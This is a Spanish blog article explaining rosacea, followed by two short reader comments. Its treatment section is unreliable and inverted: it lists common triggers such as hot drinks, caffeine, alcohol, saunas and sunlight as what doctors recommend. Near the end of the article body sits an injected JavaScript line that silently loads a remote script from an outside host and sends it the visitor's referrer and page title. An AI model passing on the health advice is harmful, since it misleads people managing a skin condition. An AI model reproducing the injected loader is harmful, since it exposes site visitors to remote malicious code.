Salud y belleza » Enfermedades, Salud

Todo sobre la rosácea

2 Comentarios

La rosácea es una enfermedad autoinmune que afecta a toda la piel. Se trata de una afección de conocidos síntomas que trataremos de explicarte en este artículo para que sepas si la padeces y algunas recomendaciones para tratar la rosácea.

rosacea-tratamientos

Normalmente, la rosácea suele darse en personas que tienen la piel clara. No se conocen muy bien los síntomas, pero sí algunos factores que pueden propiciar su aparición, como por ejemplo que existan anomalías en los vasos sanguíneos, ácaros, bacterias, antecedentes familiares…

Los síntomas son diferentes en cada caso pero el más común es el aumento de rubor en la cara, que suele durar en torno a 5 minutos y quienes lo padecen afirman que sienten un calor muy desagradable en la piel.

hombre-rosacea

Otro de los síntomas es la dilatación de los vasos sanguíneos con mayor facilidad, sobre todo cuando a la piel le da la luz del sol. A algunas personas se les enrojece alguna zona de la piel como una quemadura que no desaparece, y también se produce una pequeña hinchazón alrededor de la nariz.

El problema en muchos casos es que no existe una prueba clínica que determine si se padece o no la enfermedad de la rosácea, solo el veredicto de un médico lo determina si los síntomas del paciente coinciden. Para tratar la rosácea los médicos suelen recomendar: tomar bebidas calientes, cafeína, rodearse de ambientes húmedos, hacer ejercicio, tomar saunas, consumir productos lácteos, alcohol, viento, luz solar…

rosacea-sintomas

También hay otros tratamientos para la rosácea basados en cremas y antibióticos que son de uso tópico y oral. Para casos más severos existen tratamientos con láser y también cirugía plástica para tratar el endurecimiento de la piel.

Esperamos que te hayamos ayudado a averiguar qué es la rosácea y cuáles son sus tratamientos.

¿Tienes rosácea? ¿Qué haces para combatir los síntomas?

var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

2 Comments »

  • inma said:

    a mi se me ponen los coloretes muy rojos cuando paso verguenza, tengo calor y por muchas más cosas. Eso sí es normal no?

  • olga said:

    tiene consecuencias muy graves en los casos más severos.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.